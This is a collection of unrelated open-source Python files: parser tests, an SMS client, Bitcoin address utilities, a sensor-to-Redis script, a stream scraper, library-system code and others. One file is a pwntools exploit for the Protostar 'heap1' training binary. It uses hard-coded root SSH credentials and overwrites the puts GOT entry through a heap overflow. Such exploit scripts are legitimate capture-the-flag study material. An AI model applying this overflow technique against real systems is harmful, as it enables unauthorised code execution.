        from invenio.modules.jsonalchemy.parser import _create_field_parser
        import pyparsing
        parser = _create_field_parser()
        # Deliberately mis-indented field definition: must not parse.
        test = """
foo:
creator:
bar, '1', foo()
"""
        self.assertRaises(pyparsing.ParseException, parser.parseString, test)
        from invenio.modules.jsonalchemy.errors import FieldParserException
        tmp_file = tempfile.NamedTemporaryFile()
        config = """
foo:
creator:
bar, '1', foo()
"""
        tmp_file.write(config)
        tmp_file.flush()
        self.app.extensions['registry'][
            'testsuite.fields'].register(tmp_file.name)
        clean_field_model_definitions()
        self.assertRaises(
            FieldParserException, Field_parser.reparse, 'testsuite')
        tmp_file.close()
        clean_field_model_definitions()
    def test_wrong_field_definitions(self):
        """JSONAlchemy - wrong field definitions"""
        from invenio.modules.jsonalchemy.errors import FieldParserException
        tmp_file_4 = tempfile.NamedTemporaryFile()
        # Incomplete creator rule: must raise while reparsing.
        config_4 = '''
title:
creator:
marc, '245__', value
'''
        tmp_file_4.write(config_4)
        tmp_file_4.flush()
        clean_field_model_definitions()
        self.app.extensions['registry'][
            'testsuite.fields'].register(tmp_file_4.name)
        self.assertRaises(
            FieldParserException, Field_parser.reparse, 'testsuite')
        tmp_file_4.close()
        clean_field_model_definitions()
    def test_wrong_field_inheritance(self):
        """JSONAlchmey - not parent field definition"""
        from invenio.modules.jsonalchemy.errors import FieldParserException
        tmp_file_5 = tempfile.NamedTemporaryFile()
        # @extend on a field that has no base definition: must raise.
        config_5 = '''
@extend
wrong_field:
""" Desc """
'''
        tmp_file_5.write(config_5)
        tmp_file_5.flush()
        clean_field_model_definitions()
        self.app.extensions['registry'][
            'testsuite.fields'].register(tmp_file_5.name)
        self.assertRaises(
            FieldParserException, Field_parser.reparse, 'testsuite')
        tmp_file_5.close()
        clean_field_model_definitions()
    def test_field_rules(self):
        """JsonAlchemy - field parser"""
        self.assertTrue(len(Field_parser.field_definitions('testsuite')) >= 22)
        # Check that all files are parsed
        self.assertTrue(
            'authors' in Field_parser.field_definitions('testsuite'))
        self.assertTrue('title' in Field_parser.field_definitions('testsuite'))
        # Check work around for [n] and [0]
        self.assertTrue(
            Field_parser.field_definitions('testsuite')['doi']['pid'])
        # Check if derived and calulated are well parserd
        self.assertTrue('dummy' in Field_parser.field_definitions('testsuite'))
        self.assertEquals(
            Field_parser.field_definitions('testsuite')['dummy']['pid'], 2)
        self.assertEquals(Field_parser.field_definitions(
            'testsuite')['dummy']['rules'].keys(), ['json', 'derived'])
        self.assertTrue(
            len(Field_parser.field_definitions(
                'testsuite')['dummy']['producer']
                ),
            2
        )
        self.assertTrue(Field_parser.field_definitions('testsuite')['_random'])
        # Check override
        value = {'a': 'a', 'b': 'b', 'k': 'k'}  # noqa
        self.assertEquals(
            eval(Field_parser.field_definitions('testsuite')
                 ['title']['rules']['marc'][1]['function']),
            {'form': 'k', 'subtitle': 'b', 'title': 'a'})
        # Check extras
        self.assertTrue(
            'json_ext' in
            Field_parser.field_definitions('testsuite')['modification_date']
        )
        # Reparsing must yield the same number of definitions.
        tmp = Field_parser.field_definitions('testsuite')
        Field_parser.reparse('testsuite')
        self.assertEquals(
            len(Field_parser.field_definitions('testsuite')), len(tmp))
    def test_field_hidden_decorator(self):
        """JsonAlchemy - field hidden decorator."""
        # Check that all files are parsed
        self.assertTrue(
            'hidden_basic' in Field_parser.field_definitions('testsuite'))
        # Check default hidden value
        self.assertFalse(
            Field_parser.field_definitions('testsuite')['_id']['hidden'])
        # Check hidden field
        self.assertTrue(Field_parser.field_definitions(
            'testsuite')['hidden_basic']['hidden'])
    def test_wrong_field_name_inside_model(self):
        """JSONAlchmey - wrong field name inside model"""
        from invenio.modules.jsonalchemy.errors import ModelParserException
        tmp_file_8 = tempfile.NamedTemporaryFile()
        # Model referencing an unknown field: must raise.
        config_8 = '''
fields:
not_existing_field
'''
        tmp_file_8.write(config_8)
        tmp_file_8.flush()
        clean_field_model_definitions()
        self.app.extensions['registry'][
            'testsuite.models'].register(tmp_file_8.name)
        self.assertRaises(
            ModelParserException, Model_parser.reparse, 'testsuite')
        tmp_file_8.close()
        clean_field_model_definitions()
    def test_model_definitions(self):
        """JsonAlchemy - model parser"""
        clean_field_model_definitions()
        self.assertTrue(len(Model_parser.model_definitions('testsuite')) >= 2)
        self.assertTrue(
            'test_base' in Model_parser.model_definitions('testsuite'))
        # Reparsing must yield the same number of definitions.
        tmp = Model_parser.model_definitions('testsuite')
        Model_parser.reparse('testsuite')
        self.assertEquals(
            len(Model_parser.model_definitions('testsuite')), len(tmp))
        clean_field_model_definitions()
    def test_resolve_several_models(self):
        """JSONAlchemy - test resolve several models"""
        test_model = Model_parser.model_definitions('testsuite')['test_model']
        clean_field_model_definitions()
        self.assertEquals(
            Model_parser.resolve_models('test_model', 'testsuite')['fields'],
            test_model['fields'])
        self.assertEquals(
            Model_parser.resolve_models(
                ['test_base', 'test_model'], 'testsuite')['fields'],
            test_model['fields'])
        clean_field_model_definitions()
    def test_field_name_model_based(self):
        """JSONAlchemy - field name model based"""
        clean_field_model_definitions()
        field_model_def = Field_parser.field_definition_model_based(
            'title', 'test_model', 'testsuite')
        field_def = Field_parser.field_definitions('testsuite')['title_title']
        value = {'a': 'Awesome title', 'b': 'sub title', 'k': 'form'}
        from invenio.base.utils import try_to_eval
        # Both the model-based and the plain definition must evaluate the
        # same marc rule to the same result.
        self.assertEqual(
            try_to_eval(field_model_def['rules'][
                'marc'][0]['function'], value=value),
            try_to_eval(field_def['rules']['marc'][0]['function'],
                        value=value))
        clean_field_model_definitions()
    def test_guess_legacy_field_names(self):
        """JsonAlchemy - check legacy field names"""
        self.assertEquals(
            guess_legacy_field_names(('100__a', '245'), 'marc', 'testsuite'),
            {'100__a': ['_first_author.full_name'], '245': ['title']})
        self.assertEquals(
            guess_legacy_field_names('foo', 'bar', 'baz'), {'foo': []})
    def test_get_producer_rules(self):
        """JsonAlchemy - check producer rules"""
        clean_field_model_definitions()
        self.assertEquals(
            len(get_producer_rules('keywords', 'json_for_marc', 'testsuite')),
            1
        )
        self.assertRaises(
            KeyError,
            lambda: get_producer_rules('foo', 'json_for_marc', 'testsuite'))
        clean_field_model_definitions()
# Suite exported for Invenio's test loader; also runnable as a script.
TEST_SUITE = make_test_suite(TestParser)
if __name__ == '__main__':
    run_test_suite(TEST_SUITE)
| egabancho/invenio | invenio/modules/jsonalchemy/testsuite/test_parser.py | Python | gpl-2.0 | 10,487 |
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Urls(models.Model):
    """Mapping between an original (long) URL and its shortened form."""
    # Full destination URL; URLs longer than 256 chars will not fit.
    longurl = models.CharField(max_length=256)
    # Shortened URL / short code that redirects to longurl.
    shorturl = models.CharField(max_length=128)
| rodrigobersan/X-Serv-18.1-Practica1 | project/acorta/models.py | Python | gpl-2.0 | 219 |
# -*- coding: utf-8 -*-
__author__ = 'mkaplenko'
import httplib
import time
class MobilMoneySms(object):
    """A single outgoing SMS: destination number, text and a sync id."""

    def __init__(self, phone_to, message):
        # Synchronisation id for the gateway: current unix time in 1/100 s.
        self.sync = int(time.time() * 100)
        self.phone_to = phone_to
        self.message = message
class MobilMoneySmsClient(object):
    """HTTP client for the gate.mobilmoney.ru gateway (SendSMSFull method).

    Usage: construct with credentials, register_sms(), send_sms(), then
    read .answer for the raw gateway response.
    """
    connection_host = 'gate.mobilmoney.ru'
    response = None  # httplib response of the last send_sms() call
    sms = None  # currently registered MobilMoneySms instance
    sync = 1  # NOTE(review): appears unused; the sms carries its own sync id
    def __init__(self, login, password, originator):
        self.login = login
        self.password = password
        self.originator = originator
    def register_sms(self, sms_instance):
        """Attach the SMS that the next send_sms() call will transmit."""
        self.sms = sms_instance
    def request_body(self):
        """Build the UTF-8 encoded XML payload for SendSMSFull.

        NOTE(review): values are interpolated without XML escaping, so a
        message containing '<', '&' etc. would produce invalid XML.
        """
        data_kwargs = {
            'login': self.login,
            'password': self.password,
            'originator': self.originator,
            'phone_to': self.sms.phone_to,
            'message': self.sms.message,
            'sync': unicode(self.sms.sync)
        }
        data = u'''
<?xml version="1.0" encoding="utf-8"?>
<request method="SendSMSFull">
<login>{login}</login>
<pwd>{password}</pwd>
<originator>{originator}</originator>
<phone_to>{phone_to}</phone_to>
<message>{message}</message>
<sync>{sync}</sync>
</request>
'''.format(**data_kwargs).encode('utf-8')
        return data
    def send_sms(self):
        """POST the registered SMS to the gateway and keep the response."""
        connection = httplib.HTTPConnection(self.connection_host)
        connection.request('POST', '/', self.request_body())
        self.response = connection.getresponse()
    @property
    def answer(self):
        # Raw response body, or None if send_sms() was never called.
        return self.response.read() if self.response else None
# Manual smoke test: sends one SMS with placeholder credentials.
if __name__ == '__main__':
    sms = MobilMoneySms('+79151234567', u'Привет мир! Я тестирую смс!')
    client = MobilMoneySmsClient('my_login', 'my_password', 'my_originator_name')
    client.register_sms(sms)
    client.send_sms()
    print(client.answer)
| mkaplenko/mobilmoney_sms | client.py | Python | gpl-2.0 | 1,933 |
#!/usr/bin/env python
import binascii
import hashlib
from reversecoin.bitcoin.key import CKey as Key
from reversecoin.bitcoin.base58 import encode, decode
def myhash(s):
    """Double SHA-256 of *s* (Bitcoin's checksum hash)."""
    first_round = hashlib.sha256(s).digest()
    return hashlib.sha256(first_round).digest()
def myhash160(s):
    """RIPEMD-160 of SHA-256(s) -- Bitcoin's HASH160.

    NOTE: depends on hashlib.new('ripemd160'); recent OpenSSL builds may
    only provide RIPEMD-160 via the legacy provider.
    """
    sha = hashlib.sha256(s).digest()
    ripemd = hashlib.new('ripemd160')
    ripemd.update(sha)
    return ripemd.digest()
def getnewaddress():
    """Generate a fresh compressed keypair and its Base58Check address.

    Returns:
        (public_key, private_key, address): the raw public/private key
        bytes from the EC key and the main-network (0x00 version byte)
        Bitcoin address derived from the public key.
    """
    # Generate public and private keys
    key = Key()
    key.generate()
    key.set_compressed(True)
    private_key = key.get_privkey()
    public_key = key.get_pubkey()
    # Derive the address through the shared helper instead of duplicating
    # the hash160/version/checksum/Base58 pipeline inline (it was repeated
    # three times in this module).
    address = public_key_to_address(public_key)
    return public_key, private_key, address
def public_key_to_address(public_key):
    """Convert raw public-key bytes to a main-network Base58Check address.

    Delegates to public_key_hex_to_address() so the hash160 / version-byte /
    checksum / Base58 pipeline lives in exactly one place.
    """
    public_key_hex = public_key.encode('hex')
    return public_key_hex_to_address(public_key_hex)
def public_key_hex_to_address(public_key_hex):
    """Turn a hex-encoded public key into a Base58Check Bitcoin address."""
    raw_key = bytearray.fromhex(public_key_hex)
    # HASH160: SHA-256 followed by RIPEMD-160 of the public key.
    key_hash = myhash160(raw_key)
    # Prepend the version byte (0x00 = main network).
    versioned = '\x00' + key_hash
    # Checksum: first 4 bytes of the double SHA-256 of the versioned hash.
    checksum = myhash(versioned)[:4]
    # Base58Check-encode the 25-byte binary address.
    return encode(versioned + checksum)
def address_to_public_key_hash(address):
    """Extract the 20-byte HASH160 from a Base58Check address.

    Strips the trailing 4 checksum bytes and the leading version byte;
    the checksum itself is not verified.
    """
    raw = decode(address)
    return raw[1:-4]
def public_key_hex_to_pay_to_script_hash(public_key_hex):
    """Build a pay-to-pubkey script: PUSH(0x41) <pubkey> OP_CHECKSIG (0xAC)."""
    return binascii.unhexlify("41%sAC" % public_key_hex)
def address_to_pay_to_pubkey_hash(address):
    """Not implemented.

    The previous stub printed a message and called exit(0), which killed
    the whole interpreter with a *success* status; raising is the correct
    way to signal an unimplemented code path to callers.
    """
    raise NotImplementedError(
        "address_to_pay_to_pubkey_hash is not implemented")
def output_script_to_public_key_hash(script):
    """Return the hex HASH160 of the pubkey in a pay-to-pubkey script.

    Drops the leading push opcode and the trailing OP_CHECKSIG byte, then
    hashes the embedded raw public key.
    """
    pubkey_hex = binascii.hexlify(script[1:-1])
    return binascii.hexlify(myhash160(bytearray.fromhex(pubkey_hex)))
def address_to_output_script(address):
    """Not implemented.

    The previous stub silently returned None, which lets callers proceed
    with a bogus value; raising makes the missing functionality explicit.
    """
    raise NotImplementedError("address_to_output_script is not implemented")
# Manual smoke test against well-known key/address pairs (the genesis-era
# addresses and uncompressed public keys).
if __name__ == "__main__":
    address1 = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM"
    address2 = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
    public_key_hex1 = "0450863AD64A87AE8A2FE83C1AF1A8403CB53F53E486D8511DAD8A04887E5B23522CD470243453A299FA9E77237716103ABC11A1DF38855ED6F2EE187E9C582BA6"
    public_key_hex2 = "04678afdb0fe5548271967f1a67130b7105cd6a828e03909a67962e0ea1f61deb649f6bc3f4cef38c4f35504e51ec112de5c384df7ba0b8d578a4c702b6bf11d5f"
    print "address: ", address1
    print "public key_hex: ", public_key_hex1
    #print "public_keys_hex: ", public_key_hex1, public_key_hex2
    print "public key to address: ", public_key_hex_to_address(public_key_hex1)
    print "address to public key hash: ", binascii.hexlify(address_to_public_key_hash(address1))
    # print "public key hash: ", binascii.hexlify(myhash160(bytearray.fromhex(public_key_hex1)))
| obulpathi/reversecoin | reversecoin/bitcoin/utils.py | Python | gpl-2.0 | 4,697 |
"""
MUSE -- A Multi-algorithm-collaborative Universal Structure-prediction Environment
Copyright (C) 2010-2017 by Zhong-Li Liu
This program is free software; you can redistribute it and/or modify it under the
terms of the GNU General Public License as published by the Free Software Foundation
version 2 of the License.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the GNU General Public License for more details.
E-mail: zl.liu@163.com
"""
import os
from muse.Readwrite import Read_Write
from muse.Symmetry import Findspg
from muse.Calculators import Submit
from muse.Readwrite.ReadInput import indict
def DirectOpt(BigDict,Old_cry,nu,ng):
    """Carry the best kept structures of the previous generation forward.

    For up to Num_Keep structures from Old_cry (a list of
    (enthalpy, structure) pairs, presumably sorted best-first -- confirm
    against the caller), either re-optimize them (IfReOptKept) or copy
    them unchanged into BigDict[nu][ng], skipping duplicate space groups.
    Returns the updated BigDict.
    """
    with open('../log.muse','a') as logfile: print >>logfile
    all_enthfile = open('../all-enthalpy-'+str(nu),'a')
    if int(indict['Num_Keep'][0]) > 0:
        i = 0
        nn = 1
        nkept = 1
        spglist = []  # space groups already kept; used to skip duplicates
        while nkept <= int(indict['Num_Keep'][0]):
            if int(indict['IfReOptKept'][0]):
                # Re-optimize each kept structure from scratch.
                with open('../log.muse','a') as logfile: print >>logfile, "Direct reopt. ..."
                spgnum = Findspg.Findspg(Old_cry[i][1])
                if spgnum[0] not in spglist:
                    spglist.append(spgnum[0])
                    Read_Write.write_vasp('POSCAR',Old_cry[i][1],label=indict['NameSys'][0]+": "+str(ng)+'-'+str(nn),direct=True,sort=True,vasp5=True)
                    nk,enth,BigDict = Submit.Submit(BigDict,nu,ng,nn,Old_cry)
                    nn += 1
                    nkept +=1
            else:
                # Keep the structure as-is, just record it and its enthalpy.
                spgnum = Findspg.Findspg(Old_cry[i][1])
                if spgnum[0] not in spglist:
                    with open('../log.muse','a') as logfile: print >>logfile, "-"*23,"%d-%d"%(ng,nn),"-"*23
                    spglist.append(spgnum[0])
                    with open('../log.muse','a') as logfile:
                        print >>logfile, "%02d: %s, %s %10.4f kept, not reopt."%(i+1,spgnum[0],spgnum[1],Old_cry[i][0])
                        print >>logfile
                    BigDict[nu][ng][Old_cry[i][0]] = Old_cry[i][1].copy()
                    # Only append to the enthalpy log if this id is not
                    # already recorded (grep exit status 0 means found).
                    ifexist = os.system("grep %02d-%02d: %s"%(ng,nn,"../all-enthalpy-"+str(nu)))
                    if ifexist != 0:
                        all_enthfile.write(" %02d-%02d:%11s%9s%14.6f%14.6f%14s"%(ng,nn,spgnum[0],spgnum[1],Old_cry[i][0],Old_cry[i][1].get_volume(),'----')+'\n')
                    Read_Write.write_vasp('POSCAR',Old_cry[i][1],label=indict['NameSys'][0]+": "+"%02d-%02d"%(ng,nn)+' '+spgnum[0]+' '+str(spgnum[1])+' '+str(Old_cry[i][0]),direct=True,sort=True,vasp5=True)
                    os.system("cat POSCAR >> ../poscars-%d"%nu)
                    nn += 1
                    nkept +=1
            i +=1
    all_enthfile.close()
    return BigDict
| zhongliliu/muse | muse/Calculators/DirectOpt.py | Python | gpl-2.0 | 2,930 |
'''
Copyright (C) 2017 Quinn D Granfor <spootdev@gmail.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
version 2, as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License version 2 for more details.
You should have received a copy of the GNU General Public License
version 2 along with this program; if not, write to the Free
Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
MA 02110-1301, USA.
'''
from __future__ import absolute_import, division, print_function, unicode_literals
import json
import subprocess
import time
import pika
from common import common_global
from common import common_logging_elasticsearch
from common import common_network
# start logging
# Shared Elasticsearch-backed logger for this service, published via common_global.
common_global.es_inst = common_logging_elasticsearch.CommonElasticsearch('main_download')
def on_message(channel, method_frame, header_frame, body):
    """
    Process a single pika message: log it, dispatch on its 'Type'
    (youtube download or image fetch), then ack the delivery.
    """
    if body is None:
        return
    common_global.es_inst.com_elastic_index('info', {'msg body': body})
    msg = json.loads(body)
    msg_type = msg['Type']
    if msg_type == 'youtube':
        # blocking download via youtube-dl; archive file prevents re-downloads
        downloader = subprocess.Popen(
            ['youtube-dl', '-i', '--download-archive',
             '/mediakraken/archive.txt', msg['Data']],
            shell=False)
        downloader.wait()
    if msg_type == 'image':
        common_network.mk_network_fetch_from_url(msg['URL'], msg['Local'])
    # only ack once the work item has been handled
    channel.basic_ack(delivery_tag=method_frame.delivery_tag)
# fire off wait for it script to allow rabbitmq connection
wait_pid = subprocess.Popen(['/mediakraken/wait-for-it-ash.sh', '-h',
                             'mkrabbitmq', '-p', ' 5672'], shell=False)
wait_pid.wait()
# pika rabbitmq connection
parameters = pika.ConnectionParameters('mkrabbitmq',
                                       credentials=pika.PlainCredentials('guest', 'guest'))
connection = pika.BlockingConnection(parameters)
# setup channels and queue
channel = connection.channel()
exchange = channel.exchange_declare(exchange="mkque_download_ex", exchange_type="direct",
                                    durable=True)
queue = channel.queue_declare(queue='mkdownload', durable=True)
channel.queue_bind(exchange="mkque_download_ex", queue='mkdownload')
channel.basic_qos(prefetch_count=1)
while True:
    time.sleep(1)
    # grab message from rabbitmq if available
    try:  # since can get connection drops
        method_frame, header_frame, body = channel.basic_get(
            queue='mkdownload', no_ack=False)
        on_message(channel, method_frame, header_frame, body)
    # BUGFIX: was a bare "except:", which also swallowed
    # KeyboardInterrupt/SystemExit and made the service unstoppable
    except Exception:
        pass
# close the pika connection
# BUGFIX: was connection.cancel(); BlockingConnection is shut down with
# close().  (Unreachable while the loop above runs; kept for clarity.)
connection.close()
| MediaKraken/mkarchive | main_download.py | Python | gpl-2.0 | 3,059 |
import pytest
from conftest import assert_bash_exec
@pytest.mark.bashcomp(cmd=None, ignore_env=r"^\+COMPREPLY=")
class TestUnitTilde:
def test_1(self, bash):
assert_bash_exec(bash, "_tilde >/dev/null")
def test_2(self, bash):
"""Test environment non-pollution, detected at teardown."""
assert_bash_exec(
bash, 'foo() { local aa="~"; _tilde "$aa"; }; foo; unset foo'
)
def test_3(self, bash):
"""Test for https://bugs.debian.org/766163"""
assert_bash_exec(bash, "_tilde ~-o")
def _test_part_full(self, bash, part, full):
res = (
assert_bash_exec(
bash,
'_tilde "~%s"; echo "${COMPREPLY[@]}"' % part,
want_output=True,
)
.strip()
.split()
)
assert res
assert res[0] == "~%s" % full
def test_4(self, bash, part_full_user):
"""~full should complete to ~full unmodified."""
_, full = part_full_user
self._test_part_full(bash, full, full)
def test_5(self, bash, part_full_user):
"""~part should complete to ~full."""
part, full = part_full_user
self._test_part_full(bash, part, full)
| algorythmic/bash-completion | test/t/unit/test_unit_tilde.py | Python | gpl-2.0 | 1,246 |
from pwn import *
# Protostar "heap1" solution: runs the target binary over SSH with two
# crafted command-line arguments (Python 2 / pwntools script).
#change the host IP to your IP
sh = ssh(host='192.168.1.104', user='root',
         password='godmode', port=22)
cmd = sh.set_working_directory('/opt/protostar/bin')
e = ELF("./heap1")
# Address of the puts() slot in the binary's GOT, packed little-endian.
puts_add = p32(e.got["puts"])
# Hard-coded address 0x8048494 -- presumably winner() inside heap1;
# NOTE(review): confirm against the binary before reuse.
winner = pack(0x8048494)
print "puts: ", puts_add
# First argument: 20 bytes of padding, then the puts@GOT address.
# NOTE(review): looks like the padding overflows the first heap chunk so
# the program's later strcpy writes arg2 (winner's address) over the
# puts GOT entry -- verify the 20-byte offset against the binary.
arg1 = "A"*20
arg1 += puts_add
arg2 = winner
print sh.run(['./heap1', arg1, arg2]).recvall().strip()
| spchal/Pwn-Write-ups | protostar/ex_heap1.py | Python | gpl-2.0 | 395 |
#!/usr/bin/python
# Modified 30-Oct-2013
# tng@chegwin.org
# Retrieve:
# 1: current temperature from a TMP102 sensor
# 2: Send to redis
import sys,time
from sys import path
import datetime
from time import sleep
import re
import redis
# Redis keys written by this script expire after this many seconds, so a
# dead publisher's stale readings drop out automatically.
time_to_live = 3600
###### IMPORTANT #############
###### How close to comfortable temperature is this sensor
###### determines how much weighting this sensor
###### if used at an extreme point in the house (say cellar), set to 1
###### if used centrally (living room), set to 3 or 4
multiplier = 1
#import crankers
# Adafruit_I2C lives outside the normal site-packages layout on this box.
sys.path.append("/usr/local/lib/python2.7/site-packages/Adafruit-Raspberry-Pi-Python-Code/Adafruit_I2C/")
from Adafruit_I2C import Adafruit_I2C
# Redis client; short socket timeout so a down server fails fast.
redthis = redis.StrictRedis(host='433host',port=6379, db=0, socket_timeout=3)
room_location="cellar"
# Key names: temperature/<room>/sensor holds the reading,
# temperature/<room>/multiplier its weighting.
sensor_name="temperature/"+room_location+"/sensor"
mult_name="temperature/"+room_location+"/multiplier"
#print ("Sensor name is %s" % sensor_name)
#print ("Multiplier name is %s" % mult_name)
class Tmp102:
i2c = None
# Constructor
def __init__(self, address=0x48, mode=1, debug=False):
self.i2c = Adafruit_I2C(address, debug=debug)
self.address = address
self.debug = debug
# Make sure the specified mode is in the appropriate range
if ((mode < 0) | (mode > 3)):
if (self.debug):
print "Invalid Mode: Using STANDARD by default"
self.mode = self.__BMP085_STANDARD
else:
self.mode = mode
def readRawTemp(self):
"Reads the raw (uncompensated) temperature from the sensor"
self.i2c.write8(0, 0x00) # Set temp reading mode
raw = self.i2c.readList(0,2)
val = raw[0] << 4;
val |= raw[1] >> 4;
return val
def readTemperature(self):
"Gets the compensated temperature in degrees celcius"
RawBytes = self.readRawTemp() #get the temp from readRawTemp (above)
temp = float(float(RawBytes) * 0.0625) #this is the conversion value from the data sheet.
if (self.debug):
print "DBG: Raw Temp: 0x%04X (%d)" % (RawBytes & 0xFFFF, RawBytes)
print "DBG: Calibrated temperature = %f C" % temp
return RawBytes,temp
while True:
    try:
        # Sample the sensor and publish the reading plus its weighting.
        mytemp = Tmp102(address=0x48)
        floattemp = mytemp.readTemperature()[1]
#        print ("Float temp = %f" % floattemp)
        redthis.set(sensor_name,floattemp)
        redthis.set(mult_name,multiplier)
        # Let the keys lapse if this publisher stops running.
        redthis.expire(sensor_name,time_to_live)
        redthis.expire(mult_name,time_to_live)
    # BUGFIX: was a bare "except:", which also caught
    # KeyboardInterrupt/SystemExit and made the loop unkillable via Ctrl-C.
    except Exception:
        print ("Unable to retrieve temperature")
    time.sleep(120)
| tommybobbins/velpi | utilities/redis_sensor.py | Python | gpl-2.0 | 2,563 |
# vim: set fileencoding=utf-8 :
"""
This is a example of a unittest module
"""
import unittest
class TestExample(unittest.TestCase):
    """Sanity-check suite demonstrating the unittest layout."""

    def test_one(self):
        """A literal False must not be reported as truthy."""
        self.assertFalse(False)

    def test_two(self):
        """A literal True must be reported as truthy."""
        self.assertTrue(True)
| SabatierBoris/CecileWebSite | pyramidapp/tests/testexample.py | Python | gpl-2.0 | 407 |
# -*- coding: UTF-8 -*-
'''
videoscraper scraper for Exodus forks.
Nov 9 2018 - Checked
Updated and refactored by someone.
Originally created by others.
'''
import json, urllib, urlparse
from resources.lib.modules import client
from resources.lib.modules import directstream
class source:
    """Scraper that proxies lookups to a resolver service on localhost."""

    def __init__(self):
        self.priority = 1
        self.language = ['en']
        self.domains = ['localhost']
        self.base_link = 'http://127.0.0.1:16735'

    def movie(self, imdb, title, localtitle, aliases, year):
        """Encode the movie lookup parameters as a query string."""
        try:
            return urllib.urlencode({'imdb': imdb, 'title': title, 'year': year})
        except:
            return

    def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
        """Encode the show lookup parameters as a query string."""
        try:
            return urllib.urlencode({'imdb': imdb, 'title': tvshowtitle, 'year': year})
        except:
            return

    def episode(self, url, imdb, tvdb, title, premiered, season, episode):
        """Extend the show query string with season/episode information."""
        try:
            params = urlparse.parse_qs(url)
            params = dict((key, params[key][0] if params[key] else '') for key in params)
            return urllib.urlencode({'imdb': imdb, 'title': title, 'year': params['year'], 'season': season, 'episode': episode})
        except:
            return

    def sources(self, url, hostDict, hostprDict):
        """Query the local service for streams and normalise the results."""
        sources = []
        try:
            if not url:
                return sources
            params = urlparse.parse_qs(url)
            params = dict((key, params[key][0] if params[key] else '') for key in params)
            query_url = urlparse.urljoin(self.base_link, '/sources?%s' % urllib.urlencode(params))
            response = client.request(query_url)
            if not response: raise Exception()
            result = json.loads(response)
            try:
                # Google-video entries need a quality/url lookup first.
                for link in [i['url'] for i in result if i['source'] == 'GVIDEO']:
                    gtag = directstream.googletag(link)[0]
                    sources.append({'source': 'gvideo', 'quality': gtag['quality'], 'language': 'en', 'url': gtag['url'], 'direct': True, 'debridonly': False})
            except:
                pass
            try:
                # CDN entries are passed through as non-direct HD links.
                for link in [i['url'] for i in result if i['source'] == 'CDN']:
                    sources.append({'source': 'CDN', 'quality': 'HD', 'language': 'en', 'url': link, 'direct': False, 'debridonly': False})
            except:
                pass
            return sources
        except:
            return sources

    def resolve(self, url):
        """Pass google-video links through the googlepass resolver."""
        if 'googlevideo' in url:
            return directstream.googlepass(url)
        return url
| RuiNascimento/krepo | script.module.lambdascrapers/lib/lambdascrapers/sources_ lambdascrapers/en/videoscraper.py | Python | gpl-2.0 | 2,631 |
import tkinter

# Create the root window and hand control to Tk's event loop; the final
# print only runs after the window has been closed.
root = tkinter.Tk()
root.mainloop()
print('Anybody home?')
| simontakite/sysadmin | pythonscripts/practicalprogramming/gui/mainloop.py | Python | gpl-2.0 | 78 |
# -*- coding: utf-8 -*-
#
# RERO ILS
# Copyright (C) 2019 RERO
# Copyright (C) 2020 UCLouvain
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""API for manipulating organisation."""
from functools import partial
from elasticsearch.exceptions import NotFoundError
from .models import OrganisationIdentifier, OrganisationMetadata
from ..api import IlsRecord, IlsRecordsIndexer, IlsRecordsSearch
from ..fetchers import id_fetcher
from ..item_types.api import ItemTypesSearch
from ..libraries.api import LibrariesSearch, Library
from ..minters import id_minter
from ..providers import Provider
from ..utils import sorted_pids
from ..vendors.api import Vendor, VendorsSearch
# provider: dynamically built PID provider bound to the 'org' pid type
OrganisationProvider = type(
    'OrganisationProvider',
    (Provider,),
    dict(identifier=OrganisationIdentifier, pid_type='org')
)
# minter: mints new organisation pids through the provider above
organisation_id_minter = partial(id_minter, provider=OrganisationProvider)
# fetcher: resolves existing organisation pids through the same provider
organisation_id_fetcher = partial(id_fetcher, provider=OrganisationProvider)
class OrganisationsSearch(IlsRecordsSearch):
    """Elasticsearch search class for organisation records."""

    class Meta:
        """Meta class."""

        index = 'organisations'
        doc_types = None
        fields = ('*', )
        facets = {}
        default_filter = None

    def get_record_by_viewcode(self, viewcode, fields=None):
        """Search by viewcode.

        :param viewcode: organisation code to look up.
        :param fields: optional list of source fields to return.
        :returns: the matching organisation source document.
        :raises NotFoundError: if not exactly one record matches.
        """
        search = self.filter('term', code=viewcode).extra(size=1)
        if fields:
            search = search.source(includes=fields)
        result = search.execute()
        if result.hits.total.value != 1:
            raise NotFoundError(
                f'Organisation viewcode {viewcode}: Result not found.')
        return result.hits.hits[0]._source
class Organisation(IlsRecord):
    """Organisation record class.

    Top-level tenant record; libraries, vendors and acquisition
    receipts reference an organisation by pid.
    """
    # invenio record plumbing: pid minting/fetching and the DB model
    minter = organisation_id_minter
    fetcher = organisation_id_fetcher
    provider = OrganisationProvider
    model_cls = OrganisationMetadata
    @classmethod
    def get_all(cls):
        """Get all organisations, sorted by name."""
        return sorted([
            Organisation.get_record_by_id(_id)
            for _id in Organisation.get_all_ids()
        ], key=lambda org: org.get('name'))
    @classmethod
    def all_code(cls):
        """Get the code of every organisation."""
        return [org.get('code') for org in cls.get_all()]
    @classmethod
    def get_record_by_viewcode(cls, viewcode):
        """Get record by view code.

        NOTE(review): duplicates
        ``OrganisationsSearch.get_record_by_viewcode`` but raises a
        plain ``Exception`` instead of ``NotFoundError``.
        :param viewcode: organisation code to look up.
        :returns: the matching organisation source document.
        """
        result = OrganisationsSearch().filter(
            'term',
            code=viewcode
        ).execute()
        if result['hits']['total']['value'] != 1:
            raise Exception(
                'Organisation (get_record_by_viewcode): Result not found.')
        return result['hits']['hits'][0]['_source']
    @classmethod
    def get_record_by_online_harvested_source(cls, source):
